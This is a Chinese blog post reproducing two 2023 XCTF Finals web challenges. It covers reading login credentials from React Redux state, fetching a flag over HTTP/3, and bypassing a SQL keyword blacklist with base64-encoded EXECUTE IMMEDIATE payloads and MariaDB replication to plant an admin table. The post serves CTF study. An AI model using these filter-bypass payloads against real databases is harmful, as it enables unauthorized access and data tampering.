2023XCTF FINAL web题复现

已于 2023-04-28 15:19:56 修改
阅读量264 收藏 1
点赞数
文章标签: javascript react.js 前端 web安全 网络安全
于 2023-04-28 15:17:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_76827504/article/details/130426877
版权

当时是和SU一起去打的,完整的wp可以查看2023 XCTFfinals SU Writeup,我这里只是参考wp复现一下两道web题。

sign_in

当时比赛的时候是有一个登录界面,我这里复现用的队里yulate师傅搭的在线环境,比赛的时候没放hint之前一直是零解,后面放了hint之后才有队逐渐做出来。hint说Username and password store in React Redux state,然后开始看这个react框架,KeenLab Tech Talk(二)| 浅谈React框架的XSS及后利用里提到:

在引入了Fiber的React(16.8+),会多出 reactFiber$xxxx 属性,该属性对应的就是这个DOM在React内部对应的FiberNode,可以直接使用child属性获得子节点。节点层级可以从React Dev Tool内查看。通过读取每个FiberNode的 memoizedProps 和 memoizedState ,即可直接获取需要的Prop和State。在高版本使用React Hooks的项目中,FiberNode的 memorizedState 是一个链表,该链表内的节点次序可以参考该组件源码内 useState 的调用顺序。旧版React,引入的属性是 reactInternalInstance 。State也是一个Object而非链表,可以方便地看到每个state的名字。

然后我们可以安装React Dev Tool插件,可以直接看到state中的账号密码:

那么问题来了,能不能不用这个插件直接在前端js里搜索呢?当然是可以的:

但有几个问题,一是当时的代码混淆很多,不好找,第二是当时的密码不是明文,而是md5加密之后的,特征不明显,不好分辨是否是密码,但小红书的逆向工程师tsingshui哥哥告诉我其实还是可以通过下断点直接堆栈溯源找逻辑直接快速定位(但我不会):

然后通过账号和密码我们可以登录进后台,然后会有提示,让我们用http3.0

HTTP3.0又称为HTTP Over QUIC,其弃用TCP协议,改为使用基于UDP协议的QUIC协议来实现,所以我们现在使用的浏览器直接访问是没法访问的:

他会显示404 Not Found,HTTP3.0虽然很潮,但是目前能唯一有效连接的工具还是只有curl,想要重新编译支持HTTP3.0的话过程十分繁琐,既要下Quiche重新编译,又要下brew包管理之类的,不过好在已经有现成的docker了,用别人的就行了:

docker run -it --rm ymuski/curl-http3 curl -Lv https://url/flag.html --http3 -k

最后拿到测试flag

dbtrick

比赛时主页有一个表单可以执行sql命令,但有很多函数被过滤了:

black list
select
set
GRANTS
create
insert
load
PREPARE
rename
update
HANDLER
updatexml

然后还有一个admin.php页面:

#admin.php
<?php
//flag is in /flag 
$con = new PDO($dsn,$user,$pass); 
$sql = "select * from ctf.admin where username=? and password=?"; 
$sth = $con->prepare($sql); 
$res = $sth->execute([$_POST['username'],$_POST['password']]); 
if($sth->rowCount()!==0){ 
    readfile('/flag'); 
}

代码很简单,首先用PDO预编译确保了我们不能注入,然后只要能从ctf.admin里查出username和password的数据就可以拿到flag,用show可以查表,可以发现题目环境里的数据库里ctf.admin这个表其实根本不存在,因此需要我们自己绕过过滤创建表。

利用EXECUTE

这个方法是当时比赛时清华大学的非预期解,可以看到EXECUTE IMMEDIATE Statement,里面提到在MariaDB 10.0.3 之后,新增了一种动态SQL语句,它可以在单个操作中构建并运行动态SQL语句,它的语法为:

EXECUTE IMMEDIATE stmt_string [INTO var_name [, ...]]

其中stmt_string是要执行的 SQL 查询字符串,可以包含占位符。var_name 是可选的参数列表,用于从查询结果中接收值。我们可以在本地起一个docker测试一下:

docker run -p 127.0.0.1:3306:7706  --name mdb -e MARIADB_ROOT_PASSWORD=Password123! -d mariadb:latest
docker exec -it mdb mariadb --user root -pPassword123!

成功启动。

正常情况下我们可以使用select * from time_zone;查看time_zone下的数据:

这也意味着我们可以使用EXECUTE IMMEDIATE做相同的事,只要输入EXECUTE IMMEDIATE 'select * from time_zone';即可。

虽然创建表的那些函数都被ban了,但当时并没有ban各种字符串编码,我们可以使用UNHEX,BASE64之类的进行绕过,如:

EXECUTE IMMEDIATE FROM_BASE64('Q1JFQVRFIFRBQkxFIGFkbWluICh1c2VybmFtZSBWQVJDSEFSKDIwKSwgcGFzc3dvcmQgVkFSQ0hBUigyMCkp');

即EXECUTE IMMEDIATE 'CREATE TABLE admin (username VARCHAR(20), password VARCHAR(20))';

EXECUTE IMMEDIATE FROM_BASE64('SU5TRVJUIElOVE8gYWRtaW4gKHVzZXJuYW1lLCBwYXNzd29yZCkgVkFMVUVTICgnYWRtaW4nLCAnMTIzNDU2Jyk=');

即EXECUTE IMMEDIATE 'INSERT INTO admin (username, password) VALUES ('admin', '123456')';

最后成功建表并插入数据,在比赛时就可以拿到flag了。

mariadb主从复制

这种方法才是出题人的预期解,可以参考史上最详细Docker部署Mysql主从复制,带每一步骤图!!!

在/etc/mysql/my.cnf [mysqld]块下添加:

[mysqld]
server_id = 2 
secure_file_priv= 
log-bin = mysql-bin

主服务器执行:

CREATE USER 'admin'@'%' IDENTIFIED BY '123456';
GRANT REPLICATION SLAVE ON *.* TO 'admin'@'%';

从服务器执行:

CHANGE MASTER TO 
  MASTER_HOST='172.17.0.2', 
  MASTER_USER='admin', 
  MASTER_PASSWORD='123456', 
  MASTER_LOG_FILE='mysql-bin.000001', 
  MASTER_LOG_POS=0; START SLAVE;

主从复制建立之后我们就可以把主服务器的数据复制到从服务器里,这样就能成功建表了。

网安白菜菜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2018 XCTF FINALS
Risker
11-06 1184
欢迎关注我的新博客: http://mmmmmmlei.cn 有幸参加了 2018 XCTF FINALS,线下长了不少见识。回学校就打了上海市大学生网络安全竞赛,现在记录一下 XCTF FINALS。 攻防赛四道 pwn,Web 狗也只能打打解这样子… 解有 5 道 Misc,2 道 Web 和 4 道 pwn,和队友做出了两道 Misc ,一道 Web 和两道 pwn。不得不说这次的 Mi...
2016-XCTF Final-Richman
weixin_30635053的博客
08-05 166
抽时间将XCTF Final中Richman这个总结了下。目及ida idb所在的链接在:http://files.cnblogs.com/files/wangaohui/richman-blog.zip 在比赛中,我们很快地就Fuzz到了漏洞所在的位置,但是可能是由于现场的环境和平常线上赛的环境不太一样,并没有很快的写出漏洞利用程序。将Crash时的输入进行精简,得到下面的...
XCTF final noxss
a3320315的博客
12-06 454
0x01 目描述 这次目主要是通过css注入提取script里一个变量的值,即flag 我们举个例子,先贴出代码。 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=devic...
XCTF web进阶区wp(一)
0xdawn的博客
02-28 961
001 Training-WWW-Robots 查看robots.txt,发现Disallow: /fl0g.php,打开后得到flag。 002 baby_web 初始页面为index.php,bp抓包查看响应就行 003 warmup F12拿到源码链接source.php hint.php:flag not here, and flag in ffffllllaaaagggg &l...
XCTFwp
qq_63267612的博客
01-23 1934
simple_php 最简单的php,根据目,get a和b的值如果a和0比较返回为true,而且a为真而且b不是纯数字,而且b要大于1234满足这些条件则返回flag 所以在网页后面加上代码?a=0a&b=a4567得到flag disabled_button 目是一个不能按的按钮,那把它变成能按的就行,下载下来然后用文本打开,删除disabled,然后再用浏览器打开就能按了,可以得到flag get_post 目第一步就直接在网页后面赋值就行,然后目要求请再以POST方式随便提交一个
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
web 2.11 upload1.md
12-16
xctf
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
xctfwp
zyh18851473527的博客
09-23 1156
首先将其拖进IDA64中查看一下 根据代码可以得知猜对50次的数字后就可以get flag了 但是实际上只给buf分配了0x30的空间 buf 长度最长为 0x50 但是当输入大于 49 的时候不会被截断,所以我们只要覆盖到之前的 seed 就可以为所欲为了。 同时注意到 seed 跟 buf 相差的偏移是 0x40,所以只要 68 个字符就可以溢出覆盖 seed 了。我们写入0x40的数据就可以...
XCTF攻防世界Web新手入门WP
A1andNS's Blog
11-09 725
学习的小笔记
xctf 攻防世界 FlatScience wp
qq_43054896的博客
03-08 847
一、dirsearch 扫目录 python dirsearch.py -u URL -e * 二、查看正常响应的链接和源码 admin.php 有登录框,注入只有Nono! Stahp?! login.php 也有登录框,逻辑注入就跳转了,说明是存在注入的 输入 admin’ order by 3 #,出现报错,是sqlite数据库: 查看页面源码,提示去 URL?debug 页面: ...
Weblogic远程代码执行漏洞(CVE-2023-21839)复现/保姆级讲解
BGiscool的博客
02-28 4467
由于WeblogicIIOP/T3协议存在缺陷,当IIOP/T3协议开启时,未经身份验证的攻击者通过IIOP/T3协议向受影响的服务器发送恶意的请求,最终导致在目标服务器上访问敏感信息并执行任意代码。
kss admin index.php,XCTF Final 2018 Web Writeup (Bestphp与PUBG详解)
weixin_42303389的博客
03-11 1520
WEB1——Bestphp这道提供index.php源码index.phphighlight_file(__FILE__);error_reporting(0);ini_set('open_basedir', '/var/www/html:/tmp');$file = 'function.php';$func = isset($_GET['function'])?$_GET['function'...
xctf中php_rec的writeup,一个GET请求拿到flag——XCTF 2018 Final PUBG(WEB 2) Writeup
weixin_39544333的博客
03-13 445
环境XCTF Final 和 HITB 赶在了周四周五,周四晚上拿到目,此时队友已经对PHP代码完成了解密工作。解密后的代码: http://static.cdxy.me/DECODED.zipgithub:https://github.com/Xyntax/XCTF-2018-Final-WEB2-PUBG解密后的代码读起来有点麻烦,并无大碍。有点魔幻的get flag过程当晚并没有找到突破口...
Sortable.js板块拖拽示例
w11111xxxl的博客
07-14 759
ghostClass: 'blue-background-class' // 拖动时元素的样式类。group: 'shared', // 允许与其它具有相同组名的元素交互。-- 引入 Sortable.js 的 CSS 和 JS 文件 -->width: 150px;/* 减少宽度 */height: 70px;/* 设置高度 */-- 引入 Sortable.jsJS 文件 -->animation: 150, // 动画速度。// 初始化 Sortable。
TinyVue v3.17.0 正式发布,推出了一款基于 Quill 2.0 的富文本编辑器,功能强大、开箱即用!
最新发布
OpenTiny的博客
07-17 672
本文由体验技术团队Kagol老师原创~我们非常高兴地宣布,2024年6月26日,TinyVue 发布了 v3.17.0 🎉。TinyVue 每次大版本发布,都会给大家带来一些实用的新特性,上一个版本我们重构了 chart-core,新增 CircleProcessChart 圆环进度图等6个新的图表组件,并增加了 Statistic 数据统计组件。表格图片超链接复制粘贴插入表情文件上传@提醒斜杆菜单v-auto-tip。
JS+CSS特效:HTML+JS+CSS 实现精致的带二级菜单的头部菜单
uu0216的博客
07-16 523
既然a标签把它填满导致了原来的内圆角没有了,而去掉了a标签的背景色依然没有出现圆角。那么我不妨把第一行的两个菜单项和最后一行的两个菜单项写个圆角。这里利用子选择器实现。为了避免菜单项数量改变而导致样式的变化,需要把样式写在最后两个子列表项上,而不是第7和第8上面。所以,在最后两个列表项上,我们使用的 nth-last-child 而不是 nth-child。
高职软件技术实训室
whwzzc的博客
07-17 606
当前,软件行业正处于高速发展阶段,对人才的需求呈现出多元化、高精尖的特点。平台基于k8s实现公有云、混合云、私有云多种部署方式,提供在线html、css、js、jquery、vue等前端开发环境,实现真正的云开发,开箱即用,主要模块有课程制作工具、作业、活动、云盘、共享课、我的课、云优选课。平台基于k8s实现公有云、混合云、私有云多种部署方式,提供在线java、python等后台语言,实现真正的云开发,开箱即用,主要模块有课程制作工具、作业、活动、云盘、共享课、我的课、云优选课。
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值